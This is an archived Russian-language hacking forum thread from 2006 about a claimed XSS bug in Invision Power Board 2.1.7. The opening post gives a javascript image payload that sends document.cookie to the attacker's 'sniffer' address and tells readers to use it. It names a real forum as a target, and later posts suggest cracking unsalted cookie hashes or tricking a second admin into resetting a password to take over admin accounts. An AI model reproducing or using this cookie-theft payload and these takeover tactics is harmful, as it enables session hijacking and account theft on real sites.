PDA

Просмотр полной версии : Ура! Я вродь нашёл баг в Ipb 2.1.7


~Real F@ck!~
06.10.2006, 18:32
Короче роюсь я роюсь в своём форуме и нашёл баг-
j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg Если у кого он сработает и если я кому помог тогда жду +++ ! =) :D

И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи!

==================
Учимся соединять свой посты или продолжаем получать минусы !
==================

Fr-Ron
06.10.2006, 20:10
"Динамические страницы в тэгах [img] запрещены"

Боюсь такой же ответ ждет на большинстве форумов.

Micr0b
06.10.2006, 20:14
угу

Twiddle
07.10.2006, 05:42
Неа, не катит... А жаль.. =(

blackybr
07.10.2006, 08:16
покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..

~Real F@ck!~
07.10.2006, 11:53
blackybr forum.angelz.ru ток чур неломать а то мне капут!

WEB'er
07.10.2006, 12:11
Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать :(

Bayazid
07.10.2006, 13:01
У меня не сработала...(

_GaLs_
07.10.2006, 13:08
Наврядли у кого будет это работать. Почти ва всех форумах [img] запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
За старание можно поставить +)

-Concord-
07.10.2006, 15:29
Всё просто, но не везде идёт. я этим давно пользовался.

~Real F@ck!~
07.10.2006, 15:45
Ребят я ж попросил что на forum.angelz.ru ненадо нечего делать! Блин ну даш для примера один форум потом расхлёбывай! (=

Twiddle
07.10.2006, 16:24
Ты же там админ - заткни багу и все... ЗЫ: я не ломал.. ;)
Лови + за старания и смелость.. ;)

~Real F@ck!~
07.10.2006, 16:41
Twiddle я там неадмин, я там супермодер, т.к. имею доступ к админке, ща попробую!

_-[A.M.D]HiM@S-_
07.10.2006, 17:59
Есть еще Xss тока это надо иметь как минимум Модера.:)

Fr-Ron
07.10.2006, 21:58
_-[A.M.D]HiM@S-_
А поконкретней? Не слыхал ни разу.

BMaster
07.10.2006, 22:36
а на чо теги [warn] заменить?

Fr-Ron
07.10.2006, 22:42
Не на что их не менять. Там просто тэг [img] не идет.

BMaster
07.10.2006, 23:06
У меня не работает, вставляю блок с кодом, в посте появляется надпись:

И это обычным текстом, не ссылкой.

~Real F@ck!~
08.10.2006, 09:41
Блин что за вопросы... ща объясню-
- тег предупреждения
- тег картинки
Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега мона подставить тег

bul.666
08.10.2006, 14:25
Это пассивная Xss бага!
Помойму это активная XSS... =/

KPOT_f!nd
08.10.2006, 14:49
Помойму это активная Xss... =/
Не помойму! А точно Xss

Ksander
08.10.2006, 15:07
Не помойму! А точно Xss

Ну в том что это xss и так сомнений нету :)

ShproT
14.11.2006, 16:18
Блин что за вопросы... ща объясню- - тег предупреждения - тег картинки Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега мона подставить тег

Так, так... Вот чем у нас с.Модеры занимаются... А форум то работать перестал, ну ангелз тоесть... :confused:
Кстати насчет тегов и ...
Это у нас на форуме такие теги есть, ну еще может на парочке. дело в том, что когда делашь ВВ-коды в форуме, "название" тега можно указать любое, и необязательно это будут эти...
Так что особо не обольщайтесь насчет этой баги - в жизни её применить наврядли получится... =)

AKVELON
14.11.2006, 22:15
~Real F@ck!~ ,ты вообще офигел ???? Мой форум сделал подопытным!? Ну я в те разочаровался. ..

TTyck
15.11.2006, 01:06
Багу заделай и все прекратится=-)

~Real F@ck!~
15.11.2006, 10:19
Дурдом, я просто сказал что бага есть и спросили меня на каком форуме именно, я ответил на каком нашёл, кто пытался сделать что то в то время я темы все удалят когда был супермодером, дурдом вы чё парни? Я в чём винован? Наш форум взломали? НЕТ. Ну и все в чём проблема? А тебе AKVELON я нераз говорил багу профиксить? Так ведь? Говорил что в динамических страницах запрети использование тегов img . Ты неслушал, или говорил что времени нет. Так что на меня тут гнать ненадо.

varyag007
19.11.2006, 02:36
Вот вы тут спорите про xss, но обьясните мне дураку зачем, ведь с ним в ipb 217 ничего не сделать только если побаловаться темы поудалять. Или я неправ?

~Real F@ck!~
19.11.2006, 07:31
Хеш расшифруй несолёный, будет тебе админка, или мона второму админу письмо послать на мыло мол типа у меня пасс взломали поставь мне 123. Он ставит, админка твоя!

Fr-Ron
19.11.2006, 10:16
Еще банить можно =) И разбанивать. Ну это только если админ забанил не через админку...

varyag007
20.11.2006, 02:09
Хеш расшифруй несолёный, будет тебе админка, или мона второму админу письмо послать на мыло мол типа у меня пасс взломали поставь мне 123. Он ставит, админка твоя!

Вот скажи мне разве там вообще хеш. В куках вроде в параметре passhash не хеш а просто набор символов генерируемый форумом. Поскольку я пробовал на локалке расшифровать пароль 123 и у меня ничего не нашло(причем пробовал на разных алгоритмах)